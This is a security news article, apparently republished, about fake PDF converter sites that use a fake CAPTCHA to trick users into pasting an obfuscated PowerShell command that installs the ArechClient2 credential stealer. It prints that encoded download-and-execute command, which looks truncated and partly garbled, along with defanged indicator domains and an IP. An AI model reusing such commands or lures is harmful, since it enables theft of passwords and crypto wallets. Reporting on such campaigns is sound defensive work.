![[Webinar] AI Is Already Inside Your SaaS Stack — Learn How to Prevent the Next Silent Breach](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOWn65wd33dg2uO99NrtKbpYLfcepwOLidQDMls0HXKlA91k6HURluRA4WXgJRAZldEe1VReMQZyyYt1PgnoAn5JPpILsWlXIzmrBSs_TBoyPwO7hZrWouBg2-O3mdeoeSGY-l9_bsZB7vbpKjTSvG93zNytjxgTaMPqo9iq9Z5pGa05CJOs9uXpwHFT4/s1600/ai-cyber.jpg?#)
![[The AI Show Episode 144]: ChatGPT’s New Memory, Shopify CEO’s Leaked “AI First” Memo, Google Cloud Next Releases, o3 and o4-mini Coming Soon & Llama 4’s Rocky Launch](https://www.marketingaiinstitute.com/hubfs/ep%20144%20cover.png)
![Rogue Company Elite tier list of best characters [April 2025]](https://media.pocketgamer.com/artwork/na-33136-1657102075/rogue-company-ios-android-tier-cover.jpg?#)
_Andreas_Prott_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![What’s new in Android’s April 2025 Google System Updates [U: 4/18]](https://i0.wp.com/9to5google.com/wp-content/uploads/sites/4/2025/01/google-play-services-3.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
![Apple Watch Series 10 Back On Sale for $299! [Lowest Price Ever]](https://www.iclarified.com/images/news/96657/96657/96657-640.jpg)
![EU Postpones Apple App Store Fines Amid Tariff Negotiations [Report]](https://www.iclarified.com/images/news/97068/97068/97068-640.jpg)
![Apple Slips to Fifth in China's Smartphone Market with 9% Decline [Report]](https://www.iclarified.com/images/news/97065/97065/97065-640.jpg)
Beware of Online PDF Converters That Tricks Users to Install Password Stealing Malware
Cybercriminals have launched a sophisticated malware campaign leveraging fake PDF-to-DOCX converter websites that mimic the popular legitimate service PDFCandy. The malicious websites, including domains such as candyxpdf[.]com and candyconverterpdf[.]com, deploy an elaborate social engineering tactic designed to harvest sensitive information from unsuspecting users seeking to convert document formats. When users attempt to convert documents on […] The post Beware of Online PDF Converters That Tricks Users to Install Password Stealing Malware appeared first on Cyber Security News.
Cybercriminals have launched a sophisticated malware campaign leveraging fake PDF-to-DOCX converter websites that mimic the popular legitimate service PDFCandy.
The malicious websites, including domains such as candyxpdf[.]com and candyconverterpdf[.]com, deploy an elaborate social engineering tactic designed to harvest sensitive information from unsuspecting users seeking to convert document formats.
When users attempt to convert documents on these fraudulent platforms, they’re presented with a seemingly legitimate interface complete with animated loading sequences and familiar conversion options.
After uploading a file, victims encounter a fake CAPTCHA verification that instructs them to press Windows+R and paste a disguised PowerShell command. This command, when executed, initiates a sophisticated infection chain that ultimately deploys the ArechClient2 information stealer.
CloudSEK researchers identified that this malware is a variant of the dangerous SectopRAT family, which has been active since 2019.
Their analysis revealed the attack employs a multi-stage redirection process, connecting to domains like “bind-new-connect[.]click” before downloading a malicious “adobe.zip” payload hosted on IP address 172[.]86[.]115[.]43.
The impact of this attack is severe, as the malware is specifically designed to harvest browser credentials, cryptocurrency wallet information, and other sensitive data from compromised systems.
The infection demonstrates advanced evasion techniques, including the abuse of legitimate Windows utilities to bypass security controls.
.webp)
Infection Mechanism Analysis
The core of this attack relies on an obfuscated PowerShell command that users unwittingly execute:-
powershell -win 1 -ep bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgB1AHQALgBXAGUAYgBDAG8AYQBKAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ΘΑΥQANACKAIAB8ACAASQBFAHgA.webp)
This encoded command initiates a web request to download the “adobe.zip” archive, which contains multiple files including the malicious “audiobit[.]exe” executable.
When executed, this file launches a legitimate Windows utility, MSBuild.exe, to load the ArechClient2 malware through a technique known as living-off-the-land.
The malware performs multiple suspicious actions including registry queries, system information discovery, and credential hunting.
The malware accesses the machine GUID, computer name, and checks supported languages before proceeding to harvest sensitive data including stored passwords and cryptocurrency wallet credentials.
Users are advised to employ only trusted file conversion tools from official sources and to remain vigilant about any website requesting command-line execution, regardless of how legitimate the interface appears.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy
The post Beware of Online PDF Converters That Tricks Users to Install Password Stealing Malware appeared first on Cyber Security News.
.webp?#)
